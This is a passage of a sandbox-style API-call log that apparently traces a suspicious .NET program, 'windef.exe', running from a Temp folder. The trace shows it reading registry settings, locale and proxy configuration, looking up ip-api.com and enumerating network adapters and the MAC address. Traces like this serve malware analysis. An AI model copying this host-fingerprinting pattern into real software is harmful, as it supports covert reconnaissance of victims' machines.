returned 1 [0163.427] GetCurrentProcess () returned 0xffffffff [0163.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3d0) returned 1 [0163.427] GetCurrentProcess () returned 0xffffffff [0163.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3dc) returned 1 [0163.428] GetCurrentProcess () returned 0xffffffff [0163.428] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f08c | out: TokenHandle=0x19f08c*=0x3e0) returned 1 [0163.428] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.428] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", lpFilePart=0x0) returned 0x3a [0163.429] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\windef.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0163.429] GetCurrentProcess () returned 0xffffffff [0163.429] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3e4) returned 1 [0163.430] GetCurrentProcess () returned 0xffffffff [0163.430] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f1b4 | out: TokenHandle=0x19f1b4*=0x3e8) returned 1 [0163.465] GetCurrentProcess () returned 0xffffffff [0163.465] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef78 | out: TokenHandle=0x19ef78*=0x3ec) returned 1 [0163.527] GetCurrentProcess () returned 0xffffffff [0163.528] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef8c | out: TokenHandle=0x19ef8c*=0x3f0) returned 1 [0163.538] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0163.538] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f8 [0163.545] GetCurrentProcess () returned 0xffffffff [0163.545] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efd4 | out: TokenHandle=0x19efd4*=0x3fc) returned 1 [0163.566] GetCurrentProcess () returned 0xffffffff [0163.566] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efe8 | out: TokenHandle=0x19efe8*=0x404) returned 1 [0163.573] QueryPerformanceFrequency (in: lpFrequency=0x4870f0 | out: lpFrequency=0x4870f0*=100000000) returned 1 [0163.573] QueryPerformanceCounter (in: lpPerformanceCount=0x19f3f0 | out: lpPerformanceCount=0x19f3f0*=3380348849039) returned 1 [0163.578] GetCurrentProcess () returned 0xffffffff [0163.578] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efa4 | out: TokenHandle=0x19efa4*=0x408) returned 1 [0163.581] GetCurrentProcess () returned 0xffffffff [0163.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efb8 | out: TokenHandle=0x19efb8*=0x40c) returned 1 [0163.592] GetCurrentProcess () returned 0xffffffff [0163.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efb8 | out: TokenHandle=0x19efb8*=0x410) returned 1 [0163.596] GetCurrentProcess () returned 0xffffffff [0163.596] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efcc | out: TokenHandle=0x19efcc*=0x414) returned 1 [0163.613] GetCurrentProcess () returned 0xffffffff [0163.613] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2d8 | out: TokenHandle=0x19f2d8*=0x418) returned 1 [0163.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e424 | out: phkResult=0x19e424*=0x41c) returned 0x0 [0163.633] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e444, lpData=0x0, lpcbData=0x19e440*=0x0 | out: lpType=0x19e444*=0x1, lpData=0x0, lpcbData=0x19e440*=0xe) returned 0x0 [0163.634] RegQueryValueExW (in: hKey=0x41c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e444, lpData=0x2153c8c, lpcbData=0x19e440*=0xe | out: lpType=0x19e444*=0x1, lpData="Client", lpcbData=0x19e440*=0xe) returned 0x0 [0163.634] RegCloseKey (hKey=0x41c) returned 0x0 [0164.375] CoTaskMemAlloc (cb=0xcc0) returned 0x55c978 [0164.376] RasEnumConnectionsW (in: param_1=0x55c978, param_2=0x19f2e8, param_3=0x19f2ec | out: param_1=0x55c978, param_2=0x19f2e8, param_3=0x19f2ec) returned 0x0 [0164.644] CoTaskMemFree (pv=0x55c978) [0164.658] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19f0d0 | out: lpWSAData=0x19f0d0) returned 0 [0164.671] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x468 [0165.062] setsockopt (s=0x468, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0165.063] closesocket (s=0x468) returned 0 [0165.064] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x468 [0165.067] setsockopt (s=0x468, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0165.067] closesocket (s=0x468) returned 0 [0165.067] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x468 [0165.069] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x46c [0165.071] ioctlsocket (in: s=0x468, cmd=-2147195266, argp=0x19f2f0 | out: argp=0x19f2f0) returned 0 [0165.072] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x470 [0165.072] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x474 [0165.072] ioctlsocket (in: s=0x470, cmd=-2147195266, argp=0x19f2f0 | out: argp=0x19f2f0) returned 0 [0165.085] WSAIoctl (in: s=0x468, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0) returned -1 [0165.090] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f008, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0165.122] WSAEventSelect (s=0x468, hEventObject=0x46c, lNetworkEvents=512) returned 0 [0165.122] WSAIoctl (in: s=0x470, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f2d8, lpOverlapped=0x0) returned -1 [0165.122] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19f008, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0165.123] WSAEventSelect (s=0x470, hEventObject=0x474, lNetworkEvents=512) returned 0 [0165.123] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x47c [0165.124] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x47c, param_3=0x3) returned 0x0 [0165.135] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x19f304 | out: phkResult=0x19f304*=0x494) returned 0x0 [0165.137] RegOpenKeyExW (in: hKey=0x494, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b4 | out: phkResult=0x19f2b4*=0x498) returned 0x0 [0165.138] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x49c [0165.147] RegNotifyChangeKeyValue (hKey=0x498, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x49c, fAsynchronous=1) returned 0x0 [0165.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b8 | out: phkResult=0x19f2b8*=0x4ac) returned 0x0 [0165.159] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b0 [0165.159] RegNotifyChangeKeyValue (hKey=0x4ac, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b0, fAsynchronous=1) returned 0x0 [0165.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2b8 | out: phkResult=0x19f2b8*=0x4b4) returned 0x0 [0165.159] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4b8 [0165.160] RegNotifyChangeKeyValue (hKey=0x4b4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x4b8, fAsynchronous=1) returned 0x0 [0165.161] GetCurrentProcess () returned 0xffffffff [0165.161] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f2ac | out: TokenHandle=0x19f2ac*=0x4bc) returned 1 [0165.171] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ebb8 | out: phkResult=0x19ebb8*=0x4c0) returned 0x0 [0165.172] RegQueryValueExW (in: hKey=0x4c0, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x19ebd4, lpData=0x0, lpcbData=0x19ebd0*=0x0 | out: lpType=0x19ebd4*=0x0, lpData=0x0, lpcbData=0x19ebd0*=0x0) returned 0x2 [0165.172] RegCloseKey (hKey=0x4c0) returned 0x0 [0165.567] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x565a20 [0165.761] WinHttpSetTimeouts (hInternet=0x565a20, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0165.763] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x19f2b8 | out: pProxyConfig=0x19f2b8) returned 1 [0166.197] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x19eb30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0166.197] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x19eb30, nSize=0x80 | out: lpBuffer="") returned 0x0 [0166.205] EtwEventRegister (in: ProviderId=0x21569f8, EnableCallback=0x47d061e, CallbackContext=0x0, RegHandle=0x21569d4 | out: RegHandle=0x21569d4) returned 0x0 [0166.207] EtwEventSetInformation (RegHandle=0x559470, InformationClass=0x4d, EventInformation=0x2, InformationLength=0x2156994) returned 0x0 [0166.211] GetCurrentProcess () returned 0xffffffff [0166.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef80 | out: TokenHandle=0x19ef80*=0x4f4) returned 1 [0166.214] GetCurrentProcess () returned 0xffffffff [0166.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef94 | out: TokenHandle=0x19ef94*=0x500) returned 1 [0166.229] GetCurrentProcess () returned 0xffffffff [0166.229] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef28 | out: TokenHandle=0x19ef28*=0x504) returned 1 [0166.437] GetCurrentProcess () returned 0xffffffff [0166.438] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef3c | out: TokenHandle=0x19ef3c*=0x508) returned 1 [0166.443] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f140 | out: lpTimeZoneInformation=0x19f140) returned 0x2 [0166.447] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x19ef94 | out: pTimeZoneInformation=0x19ef94) returned 0x2 [0166.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f078 | out: phkResult=0x19f078*=0x50c) returned 0x0 [0166.452] RegQueryValueExW (in: hKey=0x50c, lpValueName="TZI", lpReserved=0x0, lpType=0x19f094, lpData=0x0, lpcbData=0x19f090*=0x0 | out: lpType=0x19f094*=0x3, lpData=0x0, lpcbData=0x19f090*=0x2c) returned 0x0 [0166.452] RegQueryValueExW (in: hKey=0x50c, lpValueName="TZI", lpReserved=0x0, lpType=0x19f094, lpData=0x215b068, lpcbData=0x19f090*=0x2c | out: lpType=0x19f094*=0x3, lpData=0x215b068*, lpcbData=0x19f090*=0x2c) returned 0x0 [0166.455] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eecc | out: phkResult=0x19eecc*=0x0) returned 0x2 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x19f06c, lpData=0x215b48c, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x19f068*=0x20) returned 0x0 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x19f06c, lpData=0x215b4e4, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x19f068*=0x20) returned 0x0 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f06c, lpData=0x0, lpcbData=0x19f068*=0x0 | out: lpType=0x19f06c*=0x1, lpData=0x0, lpcbData=0x19f068*=0x20) returned 0x0 [0166.458] RegQueryValueExW (in: hKey=0x50c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x19f06c, lpData=0x215b53c, lpcbData=0x19f068*=0x20 | out: lpType=0x19f06c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x19f068*=0x20) returned 0x0 [0166.461] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.461] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5083b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.463] CoTaskMemFree (pv=0x5083b8) [0166.463] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.465] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x5083b8, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0166.496] CoTaskMemFree (pv=0x0) [0166.496] CoTaskMemFree (pv=0x5083b8) [0166.499] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0166.524] CoTaskMemAlloc (cb=0x3ec) returned 0x5083b8 [0166.524] LoadStringW (in: hInstance=0x4ed0001, uID=0x140, lpBuffer=0x5083b8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0166.525] CoTaskMemFree (pv=0x5083b8) [0166.525] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0166.526] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.526] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5083b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.526] CoTaskMemFree (pv=0x5083b8) [0166.526] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.527] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x5083b8, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0166.531] CoTaskMemFree (pv=0x0) [0166.532] CoTaskMemFree (pv=0x5083b8) [0166.532] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0166.536] CoTaskMemAlloc (cb=0x3ec) returned 0x5083b8 [0166.536] LoadStringW (in: hInstance=0x4ed0001, uID=0x142, lpBuffer=0x5083b8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0166.536] CoTaskMemFree (pv=0x5083b8) [0166.536] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0166.538] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.538] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x5083b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0166.538] CoTaskMemFree (pv=0x5083b8) [0166.538] CoTaskMemAlloc (cb=0x20c) returned 0x5083b8 [0166.538] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath=0x5083b8, pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080 | out: pwszLanguage=0x0, pcchLanguage=0x19f088, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x19f08c, pululEnumerator=0x19f080) returned 1 [0166.541] CoTaskMemFree (pv=0x0) [0166.541] CoTaskMemFree (pv=0x5083b8) [0166.541] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4ed0001 [0166.545] CoTaskMemAlloc (cb=0x3ec) returned 0x5083b8 [0166.545] LoadStringW (in: hInstance=0x4ed0001, uID=0x141, lpBuffer=0x5083b8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0166.545] CoTaskMemFree (pv=0x5083b8) [0166.545] FreeLibrary (hLibModule=0x4ed0001) returned 1 [0166.547] RegCloseKey (hKey=0x50c) returned 0x0 [0166.549] SetEvent (hEvent=0x3f4) returned 1 [0166.562] EtwEventRegister (in: ProviderId=0x215eda8, EnableCallback=0x47d0646, CallbackContext=0x0, RegHandle=0x215ed84 | out: RegHandle=0x215ed84) returned 0x0 [0166.563] EtwEventSetInformation (RegHandle=0x55a0a0, InformationClass=0x4e, EventInformation=0x2, InformationLength=0x215ed48) returned 0x0 [0166.573] SetEvent (hEvent=0x3f4) returned 1 [0166.577] GetACP () returned 0x4e4 [0166.621] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x19f26c | out: pFixedInfo=0x0, pOutBufLen=0x19f26c) returned 0x6f [0167.292] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x576650 [0167.293] GetNetworkParams (in: pFixedInfo=0x576650, pOutBufLen=0x19f26c | out: pFixedInfo=0x576650, pOutBufLen=0x19f26c) returned 0x0 [0167.313] LocalFree (hMem=0x576650) returned 0x0 [0167.318] CoTaskMemAlloc (cb=0x20c) returned 0x576650 [0167.318] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x576650, nSize=0x104 | out: lpBuffer="") returned 0x0 [0167.318] CoTaskMemFree (pv=0x576650) [0167.318] CoTaskMemAlloc (cb=0x20c) returned 0x576650 [0167.318] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x576650, nSize=0x104 | out: lpBuffer="") returned 0x0 [0167.318] CoTaskMemFree (pv=0x576650) [0167.334] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x568 [0167.336] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x540 [0167.339] GetAddrInfoW (in: pNodeName="ip-api.com", pServiceName=0x0, pHints=0x19f15c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f104 | out: ppResult=0x19f104*=0x55b070*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x5682b8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) returned 0 [0168.167] FreeAddrInfoW (pAddrInfo=0x55b070*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="ip-api.com", ai_addr=0x5682b8*(sa_family=2, sin_port=0x0, sin_addr="208.95.112.1"), ai_next=0x0)) [0168.170] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x570 [0168.171] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x57c [0168.171] ioctlsocket (in: s=0x570, cmd=-2147195266, argp=0x19f134 | out: argp=0x19f134) returned 0 [0168.171] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x580 [0168.171] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x584 [0168.171] ioctlsocket (in: s=0x580, cmd=-2147195266, argp=0x19f134 | out: argp=0x19f134) returned 0 [0168.171] WSAIoctl (in: s=0x570, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0) returned -1 [0168.172] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee4c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0168.172] WSAEventSelect (s=0x570, hEventObject=0x57c, lNetworkEvents=512) returned 0 [0168.172] WSAIoctl (in: s=0x580, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f11c, lpOverlapped=0x0) returned -1 [0168.172] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ee4c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0168.172] WSAEventSelect (s=0x580, hEventObject=0x584, lNetworkEvents=512) returned 0 [0168.173] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x19f118*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x19f118*=0xa78) returned 0x6f [0168.177] LocalAlloc (uFlags=0x0, uBytes=0xa78) returned 0x56b8d0 [0168.178] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x56b8d0, SizePointer=0x19f118*=0xa78 | out: AdapterAddresses=0x56b8d0*(Alignment=0x500000178, Length=0x178, IfIndex=0x5, Next=0x56bb78, AdapterName="{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}", FirstUnicastAddress=0x56baec, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection", FriendlyName="Ethernet", PhysicalAddress=([0]=0x0, [1]=0x21, [2]=0x9a, [3]=0x62, [4]=0xc9, [5]=0xd0, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x1c5, DdnsEnabled=0x1c5, RegisterAdapterSuffix=0x1c5, Dhcpv4Enabled=0x1c5, ReceiveOnly=0x1c5, NoMulticast=0x1c5, Ipv6OtherStatefulConfig=0x1c5, NetbiosOverTcpipEnabled=0x1c5, Ipv4Enabled=0x1c5, Ipv6Enabled=0x1c5, Ipv6ManagedAddressConfigurationSupported=0x1c5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0x5, ZoneIndices=([0]=0x5, [1]=0x5, [2]=0x5, [3]=0x5, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6008000000000, Dhcpv4Server.lpSockaddr=0x56ba48*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11eb6c9dc20d55b0, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x28, [5]=0xb6, [6]=0x28, [7]=0x5e, [8]=0x0, [9]=0xf, [10]=0xf3, [11]=0xe1, [12]=0x61, [13]=0x38, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, 